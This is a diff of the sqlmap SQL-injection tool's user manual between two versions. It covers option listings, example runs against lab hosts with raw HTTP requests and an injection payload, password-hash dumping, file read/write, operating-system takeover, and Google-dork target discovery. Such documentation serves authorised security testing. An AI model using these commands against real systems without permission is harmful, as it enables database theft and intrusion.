     --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
     --proxy=PROXY       Use a HTTP proxy to connect to the target url
+    --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
     --ignore-proxy      Ignore system default HTTP proxy
-    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
     --delay=DELAY       Delay in seconds between each HTTP request
     --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
     --retries=RETRIES   Retries when the connection timeouts (default 3)
     --scope=SCOPE       Regexp to filter targets from provided proxy log
+    --safe-url=SAFURL   Url address to visit frequently during testing
+    --safe-freq=SAFREQ  Test requests between two visits to a given safe url
+
+  Optimization:
+    These options can be used to optimize the performance of sqlmap.
+
+    -o                  Turn on all optimization switches
+    --predict-output    Predict common queries output
+    --keep-alive        Use persistent HTTP(s) connections
+    --null-connection   Retrieve page length without actual HTTP response body
+    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
+    --group-concat      Use GROUP_CONCAT MySQL technique in dumping phase
 
   Injection:
     These options can be used to specify which parameters to test for,
-    provide custom injection payloads and how to parse and compare HTTP
-    responses page content when using the blind SQL injection technique.
+    provide custom injection payloads and optional tampering scripts.
 
     -p TESTPARAMETER    Testable parameter(s)
     --dbms=DBMS         Force back-end DBMS to this value
     --os=OS             Force back-end DBMS operating system to this value
     --prefix=PREFIX     Injection payload prefix string
-    --postfix=POSTFIX   Injection payload postfix string
+    --suffix=SUFFIX     Injection payload suffix string
+    --tamper=TAMPER     Use given script(s) for tampering injection data
+
+  Detection:
+    These options can be used to specify how to parse and compare page
+    content from HTTP responses when using blind SQL injection technique.
+
+    --level=LEVEL       Level of tests to perform (1-5, default 1)
+    --risk=RISK         Risk of tests to perform (0-3, default 1)
     --string=STRING     String to match in page when the query is valid
     --regexp=REGEXP     Regexp to match in page when the query is valid
-    --excl-str=ESTRING  String to be excluded before comparing page contents
-    --excl-reg=EREGEXP  Matches to be excluded before comparing page contents
+    --text-only         Compare pages based only on their textual content
 
   Techniques:
-    These options can be used to test for specific SQL injection technique
-    or to use one of them to exploit the affected parameter(s) rather than
-    using the default blind SQL injection technique.
+    These options can be used to tweak how specific SQL injection
+    techniques are tested.
 
-    --stacked-test      Test for stacked queries (multiple statements) support
-    --time-test         Test for time based blind SQL injection
     --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
-    --union-test        Test for UNION query (inband) SQL injection
-    --union-tech=UTECH  Technique to test for UNION query SQL injection
-    --union-use         Use the UNION query (inband) SQL injection to retrieve
-                        the queries output. No need to go blind
+    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
+    --union-char=UCHAR  Character to use to bruteforce number of columns
 
   Fingerprint:
     -f, --fingerprint   Perform an extensive DBMS version fingerprint
@@ -869,11 +955,13 @@ Options:
     --users             Enumerate DBMS users
     --passwords         Enumerate DBMS users password hashes
     --privileges        Enumerate DBMS users privileges
+    --roles             Enumerate DBMS users roles
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables
     --columns           Enumerate DBMS database table columns
     --dump              Dump DBMS database table entries
     --dump-all          Dump all DBMS databases tables entries
+    --search            Search column(s), table(s) and/or database name(s)
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
@@ -886,6 +974,12 @@ Options:
     --sql-query=QUERY   SQL statement to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
+  Brute force:
+    These options can be used to run brute force checks.
+
+    --common-tables     Check existence of common tables
+    --common-columns    Check existence of common columns
+
   User-defined function injection:
     These options can be used to create custom user-defined functions.
 
@@ -896,9 +990,9 @@ Options:
     These options can be used to access the back-end database management
     system underlying file system.
 
-    --read-file=RFILE   Read a file from the back-end DBMS file system
-    --write-file=WFILE  Write a local file on the back-end DBMS file system
-    --dest-file=DFILE   Back-end DBMS absolute filepath to write to
+    --file-read=RFILE   Read a file from the back-end DBMS file system
+    --file-write=WFILE  Write a local file on the back-end DBMS file system
+    --file-dest=DFILE   Back-end DBMS absolute filepath to write to
 
   Operating system access:
     These options can be used to access the back-end database management
@@ -925,15 +1019,26 @@ Options:
     --reg-data=REGDATA  Windows registry key value data
     --reg-type=REGTYPE  Windows registry key value type
 
-  Miscellaneous:
+  General:
+    These options can be used to set some general working parameters.
+
+    -x XMLFILE          Dump the data into an XML file
     -s SESSIONFILE      Save and resume all data retrieved on a session file
+    -t TRAFFICFILE      Log all HTTP traffic into a textual file
     --flush-session     Flush session file for current target
     --eta               Display for each output the estimated time of arrival
-    --gpage=GOOGLEPAGE  Use google dork results from specified page number
     --update            Update sqlmap
     --save              Save options on a configuration INI file
     --batch             Never ask for user input, use the default behaviour
+
+  Miscellaneous:
+    --beep              Alert when sql injection found
+    --check-payload     IDS detection testing of injection payload
     --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
+    --forms             Parse and test forms on target url
+    --gpage=GOOGLEPAGE  Use google dork results from specified page number
+    --parse-errors      Parse DBMS error messages from response pages
+    --replicate         Replicate dumped data into a sqlite3 database

    @@ -942,313 +1047,63 @@ Options:

    5.1 Output verbosity

    -

    Option: -v

    +

    Switch: -v

    -

    Verbose options can be used to set the verbosity level of output messages. -There exist six levels. -The default level is 1 in which -information, warnings, errors and tracebacks (if any occur) will be shown. -Level 2 shows also debug messages, level 3 shows also -full HTTP requests, level 4 shows also HTTP responses headers and -level 5 shows also HTTP responses page content.

    - -

    Example on a MySQL 5.0.67 target (verbosity level 1):

    +

    This switch can be used to set the verbosity level of output messages. +There exist seven levels of verbosity. +The default level is 1 in which information, warning, error and critical messages and Python tracebacks (if any occur) will be displayed.

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
-
-[hh:mm:58] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:58] [INFO] testing connection to the target url
-[hh:mm:58] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:59] [INFO] url is stable
-[hh:mm:59] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:59] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:59] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:59] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:59] [INFO] GET parameter 'id' is dynamic
-[hh:mm:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:59] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:59] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:59] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:59] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:59] [INFO] testing MySQL
-[hh:mm:59] [INFO] confirming MySQL
-[hh:mm:59] [INFO] retrieved: 0
-[hh:mm:59] [INFO] the back-end DBMS is MySQL
-
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-
    -
    +

    -

    Example on a MySQL 5.0.67 target (verbosity level 2):

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2
-
-[hh:mm:22] [DEBUG] initializing the configuration
-[hh:mm:22] [DEBUG] initializing the knowledge base
-[hh:mm:22] [DEBUG] cleaning up configuration parameters
-[hh:mm:22] [DEBUG] setting the HTTP timeout
-[hh:mm:22] [DEBUG] setting the HTTP method to GET
-[hh:mm:22] [DEBUG] creating HTTP requests opener object
-[hh:mm:22] [DEBUG] parsing XML queries file
-[hh:mm:22] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:23] [INFO] url is stable
-[hh:mm:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:23] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:23] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:23] [DEBUG] setting match ratio to 0.743
-[hh:mm:23] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:23] [INFO] GET parameter 'id' is dynamic
-[hh:mm:23] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:23] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:23] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:23] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:23] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:23] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:23] [INFO] testing MySQL
-[hh:mm:23] [INFO] confirming MySQL
-[hh:mm:23] [DEBUG] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:23] [INFO] retrieved: 2
-[hh:mm:23] [DEBUG] performed 7 queries in 0 seconds
-[hh:mm:23] [INFO] the back-end DBMS is MySQL
-
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-
    -
    -

    - -

    Example on a MySQL 5.0.67 target (verbosity level 3):

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 3
-
-[hh:mm:53] [DEBUG] initializing the configuration
-[hh:mm:53] [DEBUG] initializing the knowledge base
-[hh:mm:53] [DEBUG] cleaning up configuration parameters
-[hh:mm:53] [DEBUG] setting the HTTP timeout
-[hh:mm:53] [DEBUG] setting the HTTP method to GET
-[hh:mm:53] [DEBUG] creating HTTP requests opener object
-[hh:mm:53] [DEBUG] parsing XML queries file
-[hh:mm:53] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:53] [INFO] testing connection to the target url
-[hh:mm:53] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-[...]
-[hh:mm:54] [INFO] testing MySQL
-[hh:mm:54] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20AND%20CONNECTION_ID%28%29=CONNECTION_ID%28%29%20AND%202385=2385 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-[...]
-
    -
    -

    - -

    Example on a MySQL 5.0.67 target (verbosity level 4):

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 4
-
-[...]
-[hh:mm:20] [DEBUG] initializing the configuration
-[hh:mm:20] [DEBUG] initializing the knowledge base
-[hh:mm:20] [DEBUG] cleaning up configuration parameters
-[hh:mm:20] [DEBUG] setting the HTTP timeout
-[hh:mm:20] [DEBUG] setting the HTTP method to GET
-[hh:mm:20] [DEBUG] creating HTTP requests opener object
-[hh:mm:20] [DEBUG] parsing XML queries file
-[hh:mm:20] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:20] [INFO] testing connection to the target url
-[hh:mm:20] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-
-[hh:mm:20] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Sat, 20 Feb 2010 17:43:00 GMT
-Server: Apache/2.2.9
-X-Powered-By: PHP/5.2.6-1+lenny4
-Vary: Accept-Encoding
-Content-Length: 127
-Connection: close
-Content-Type: text/html
-[...]
-
    -
    -

    - -

    Example on a MySQL 5.0.67 target (verbosity level 5):

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5
-
-[hh:mm:47] [DEBUG] initializing the configuration
-[hh:mm:47] [DEBUG] initializing the knowledge base
-[hh:mm:47] [DEBUG] cleaning up configuration parameters
-[hh:mm:47] [DEBUG] setting the HTTP timeout
-[hh:mm:47] [DEBUG] setting the HTTP method to GET
-[hh:mm:47] [DEBUG] creating HTTP requests opener object
-[hh:mm:47] [DEBUG] parsing XML queries file
-[hh:mm:47] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:47] [INFO] testing connection to the target url
-[hh:mm:47] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-
-[hh:mm:47] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Sat, 20 Feb 2010 17:44:27 GMT
-Server: Apache/2.2.9
-X-Powered-By: PHP/5.2.6-1+lenny4
-Vary: Accept-Encoding
-Connection: close
-Transfer-Encoding: chunked
-Content-Type: text/html
-
-<html><body>
-<b>SQL results:</b>
-<table border="1">
-<tr><td>1</td><td>luther</td><td>blissett</td></tr>
-</table>
-</body></html>
-[...]
-
    -
    -

    +

    A reasonable level of verbosity to further understand what sqlmap does under the hood is level 2, primarily for the detection phase and the take-over functionalities. Whereas if you want to see the SQL payloads the tools sends, level 3 is your best choice. +In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level 4 or above. This level is recommended to be used when you feed the developers with a bug report too.

    5.2 Target

    -

    At least one of these options has to be specified to set the source to get -target addresses from.

    +

    At least one of these options has to be provided.

    Target URL

    -

    Option: -u or --url

    - -

    To run sqlmap against a single target URL.

    - -

    Example on a MySQL 5.0.67 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1"
-
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL 5
-
    -
    -

    +

    Switch: -u or --url

    +

    Run sqlmap against a single target URL. This switch requires an argument +which is the target URL in the form http(s)://targeturl/[...].

    Parse targets from Burp or WebScarab proxy logs

    -

    Option: -l

    +

    Switch: -l

    Rather than providing a single target URL, it is possible to test and -inject on HTTP requests proxied through -Burp proxy -or -WebScarab proxy.

    - -

    Example passing to sqlmap a WebScarab proxy conversations/ folder:

    -

    -

    -
    -$ python sqlmap.py -l /tmp/webscarab.log/conversations/
-
-[hh:mm:43] [INFO] sqlmap parsed 27 testable requests from the targets list
-[hh:mm:43] [INFO] sqlmap got a total of 27 targets
-[hh:mm:43] [INPUT] url 1:
-GET http://172.16.213.131/phpmyadmin/navigation.php?db=test&token=60747016432606019619a
-c58b3780562
-Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3; phpMyAdmin=366c9c9b329a98eabb4b708c2df8b
-d7d392eb151; pmaCookieVer=4; pmaPass-1=uH9%2Fz5%2FsB%2FM%3D; pmaUser-1=pInZx5iWPrA%3D; 
-pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; pma_fontsize=deleted; 
-pma_lang=en-utf-8; pma_mcrypt_iv=o6Mwtqw6c0c%3D; pma_theme=deleted
-do you want to test this url? [Y/n/q] n
-[hh:mm:46] [INPUT] url 2:
-GET http://172.16.213.131/sqlmap/mysql/get_int.php?id=1
-Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3
-do you want to test this url? [Y/n/q] y
-[hh:mm:49] [INFO] testing url http://172.16.213.131/sqlmap/mysql/get_int.php?id=1
-[hh:mm:49] [INFO] testing connection to the target url
-[hh:mm:49] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:50] [INFO] url is stable
-[hh:mm:50] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:50] [INFO] testing if Cookie parameter 'PPA_ID' is dynamic
-[hh:mm:50] [WARNING] Cookie parameter 'PPA_ID' is not dynamic
-[hh:mm:50] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:50] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:50] [INFO] GET parameter 'id' is dynamic
-[hh:mm:50] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:50] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:50] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:50] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:50] [INPUT] do you want to exploit this SQL injection? [Y/n] y
-[hh:mm:29] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:29] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:29] [INFO] testing MySQL
-[hh:mm:29] [INFO] retrieved: 99
-[hh:mm:29] [INFO] confirming MySQL
-[hh:mm:29] [INFO] retrieved: 1
-[hh:mm:29] [INFO] retrieved: 9
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-[...]
-
    -
    -

    - +inject against HTTP requests proxied through +Burp proxy or +WebScarab proxy This switch requires an argument which is the +proxy's HTTP requests log file.

    Load HTTP request from a file

    -

    Option: -r

    +

    Switch: -r

    -

    One of the possibilities of sqlmap is loading of complete HTTP -request packet stored in textual file. That way you can skip usage of -bunch of other options.

    +

    One of the possibilities of sqlmap is loading of complete HTTP request +from a textual file. That way you can skip usage of bunch of other +options (e.g. setting of cookies, POSTed data, etc).

    -

    Sample content of a HTTP request file:

    +

    Sample content of a HTTP request file provided as argument to this switch:

     POST /sqlmap/mysql/post_int.php HTTP/1.1
-Host: 172.16.213.131
+Host: 192.168.136.131
 User-Agent: Mozilla/4.0
 
 id=1
@@ -1256,49 +1111,18 @@ id=1

    -

    Example usage:

    -

    -

    -
    -$ python sqlmap.py -r request.txt
-
-[...]
-[hh:mm:27] [INFO] parsing HTTP request from 'request.txt'
-[...]
-[hh:mm:21] [INFO] testing if POST parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that POST parameter 'id' is dynamic
-[hh:mm:22] [INFO] POST parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on POST parameter 'id' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on POST parameter 'id'
-[hh:mm:22] [INFO] confirming unescaped numeric injection on POST parameter 'id'
-[hh:mm:22] [INFO] POST parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:22] [INFO] testing MySQL
-[hh:mm:22] [INFO] confirming MySQL
-[hh:mm:22] [INFO] retrieved: 3
-[hh:mm:22] [INFO] the back-end DBMS is MySQL
-web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
-web application technology: PHP 5.2.4, Apache 2.2.8
-back-end DBMS: MySQL >= 5.0.0
-
    -
    -

    - -

    Process Google dork results as target addresses

    -

    Option: -g

    +

    Switch: -g

    It is also possible to test and inject on GET parameters on the results of your Google dork.

    This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap will retrieve Google -first 100 results for the Google dork expression with GET parameters -asking you if you want to test and inject on each possible affected URL.

    +first 100 results for the Google dork expression with GET +parameters asking you if you want to test and inject on each possible +affected URL.

    Example of Google dorking with expression site:yourdomain.com ext:php:

    @@ -1321,15 +1145,6 @@ url? [y/N/q] n GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you want to test this url? [y/N/q] y [hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483 -[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds -[hh:mm:49] [INFO] url is stable -[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic -[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic -[hh:mm:53] [INFO] GET parameter 'today' is dynamic -[hh:mm:54] [INFO] testing sql injection on GET parameter 'today' -[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today' -[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today' -[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable [...] @@ -1338,688 +1153,428 @@ want to test this url? [y/N/q] y

    Load options from a configuration INI file

    -

    Option: -c

    +

    Switch: -c

    It is possible to pass user's options from a configuration INI file, an example is sqlmap.conf.

    -

    Example usage:

    -

    -

    -
    -$ python sqlmap.py -c "sqlmap.conf"
-
-[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
-back-end DBMS:  MySQL >= 5.0.0
-
    -
    -

    -

    Note that if you also provide other options from command line, those are -evaluated when running sqlmap and overwrite the same options, if set, in -the provided configuration file.

    +evaluated when running sqlmap and overwrite those provided in the +configuration file.

    5.3 Request

    -

    These options can be used to specify how to connect to the target -application.

    +

    These options can be used to specify how to connect to the target url.

    -

    HTTP method: GET or POST

    +

    HTTP data

    -

    Options: --method and --data

    +

    Option: --data

    By default the HTTP method used to perform HTTP requests is GET, -but you can change it to POST and provide the data to be sent -through POST request. Such data, being those parameters, are -tested for SQL injection like the GET parameters.

    - -

    Example on an Oracle XE 10.2.0.1 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/post_int.php" --method POST \
-  --data "id=1"
-
-[hh:mm:53] [INFO] testing connection to the target url
-[hh:mm:53] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:54] [INFO] url is stable
-[hh:mm:54] [INFO] testing if POST parameter 'id' is dynamic
-[hh:mm:54] [INFO] confirming that POST parameter 'id' is dynamic
-[hh:mm:54] [INFO] POST parameter 'id' is dynamic
-[hh:mm:54] [INFO] testing sql injection on POST parameter 'id'
-[hh:mm:54] [INFO] testing numeric/unescaped injection on POST parameter 'id'
-[hh:mm:54] [INFO] confirming numeric/unescaped injection on POST parameter 'id'
-[hh:mm:54] [INFO] POST parameter 'id' is numeric/unescaped injectable
-[...]
-[hh:mm:54] [INFO] testing Oracle
-[hh:mm:54] [INFO] retrieved: 9
-[hh:mm:54] [INFO] confirming Oracle
-[hh:mm:54] [INFO] retrieved: 10.2.0.1.0
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS:    Oracle
-
    -
    -

    +but you can implicitly change it to POST by providing the data to +be sent in the POST requests. Such data, being those parameters, +are tested for SQL injection as well as any provided GET +parameters.

    HTTP Cookie header

    -

    Options: --cookie, --cookie-urlencode and --drop-set-cookie

    +

    Switches: --cookie, --drop-set-cookie +and --cookie-urlencode

    -

    This feature can be useful in two scenarios:

    +

    This feature can be useful in two ways:

    -

    The steps to go through in the second scenario are the following:

    +

    Either reason brings you to need to send cookies with sqlmap requests, the +steps to go through are the following:

    -

    Example on a Microsoft SQL Server 2000 Service Pack 0 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/cookie_int.php" --cookie \
-  "id=1" -v 1
-
-[hh:mm:37] [INFO] testing connection to the target url
-[hh:mm:37] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:38] [INFO] url is stable
-[hh:mm:38] [INFO] testing if Cookie parameter 'id' is dynamic
-[hh:mm:38] [INFO] confirming that Cookie parameter 'id' is dynamic
-[hh:mm:38] [INFO] Cookie parameter 'id' is dynamic
-[hh:mm:38] [INFO] testing sql injection on Cookie parameter 'id'
-[hh:mm:38] [INFO] testing numeric/unescaped injection on Cookie parameter 'id'
-[hh:mm:38] [INFO] confirming numeric/unescaped injection on Cookie parameter 'id'
-[hh:mm:38] [INFO] Cookie parameter 'id' is numeric/unescaped injectable
-[...]
-
    -
    -

    -

    Note that the HTTP Cookie header values are usually separated by -a ; character, not by an &.

    +a ; character, not by an &. sqlmap can +recognize these as separate sets of parameter=value too, as well +as GET and POST parameters.

    -

    If the web application at first HTTP response has a Set-Cookie -header, sqlmap will automatically use it's value in all further HTTP -requests as the Cookie header. sqlmap will also automatically -test that value for SQL injection, except if you run it with ---drop-set-cookie option.

    +

    If at any time during the communication, the web application responds with +Set-Cookie headers, sqlmap will automatically use its value in +all further HTTP requests as the Cookie header. sqlmap will also +automatically test those values for SQL injection. This can be avoided by +providing the switch --drop-set-cookie - sqlmap will +ignore any coming Set-Cookie header.

    -

    Example on a Microsoft SQL Server 2000 Service Pack 0 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" -v 3
+
    Vice versa, if you provide a HTTP Cookie header with
+--cookie switch and the target URL sends an HTTP
+Set-Cookie header at any time, sqlmap will ask you which set of
+cookies to use for the following HTTP requests.
    
 
-[...]
-[hh:mm:39] [INFO] testing connection to the target url
-[hh:mm:39] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/get_str.asp?name=luther HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.128:80
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
-Connection: close
+
    sqlmap by default does not URL-encode generated cookie payloads,
+but you can force it by using the --cookie-urlencode
+switch. Cookie content encoding is not declared by HTTP protocol standard
+in any way, so it is solely the matter of web application's behaviour.
    
 
-[...]
-[hh:mm:40] [INFO] url is stable
-[...]
-[hh:mm:40] [INFO] testing if Cookie parameter 'ASPSESSIONIDSABTRCAS' is dynamic
-[hh:mm:40] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/get_str.asp?name=luther HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.128:80
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-Cookie: ASPSESSIONIDSABTRCAS=469
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
-[...]
-
    -
    -

    - -

    If you provide an HTTP Cookie header value and the target URL -sends an HTTP Set-Cookie header, sqlmap asks you which one to use -in the following HTTP requests.

    - -

    Example on a Microsoft SQL Server 2000 Service Pack 0 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" --cookie "id=1"
-
-[hh:mm:51] [INPUT] you provided an HTTP Cookie header value. The target url provided its
-own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP cookie
-values that you provided? [Y/n] 
-
    -
    -

    - -

    sqlmap by default doesn't URL encode generated cookie injections, but you can force it by -using the --cookie-urlencode flag. Cookie content encoding is not declared -by standard in any way, so it's solely the matter of web application's behaviour.

    +

    Note that also the HTTP Cookie header is tested against SQL +injection if the --level is set to 2 or above. +Read below for details.

    HTTP User-Agent header

    -

    Options: --user-agent and -a

    +

    Switches: --user-agent and --random-agent

    -

    By default sqlmap perform HTTP requests providing the following HTTP -User-Agent header value:

    +

    By default sqlmap performs HTTP requests with the following User-Agent +header value:

    -sqlmap/0.8 (http://sqlmap.sourceforge.net)
+sqlmap/0.9 (http://sqlmap.sourceforge.net)

    -

    It is possible to fake it with the --user-agent option.

    +

    However, it is possible to fake it with the --user-agent +switch by providing custom User-Agent as the switch argument.

    -

    Example on an Oracle XE 10.2.0.1 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
-  --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
-
-[...]
-[hh:mm:02] [INFO] testing connection to the target url
-[hh:mm:02] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
-Connection: close
-[...]
-
    -
    -

    - -

    Providing a text file, ./txt/user-agents.txt or any other -file containing a list of at least one user agent, to the -a -option, sqlmap will randomly select a User-Agent from the file -and use it for all HTTP requests.

    - -

    Example on a MySQL 5.0.67 target:

    -

    -

    -
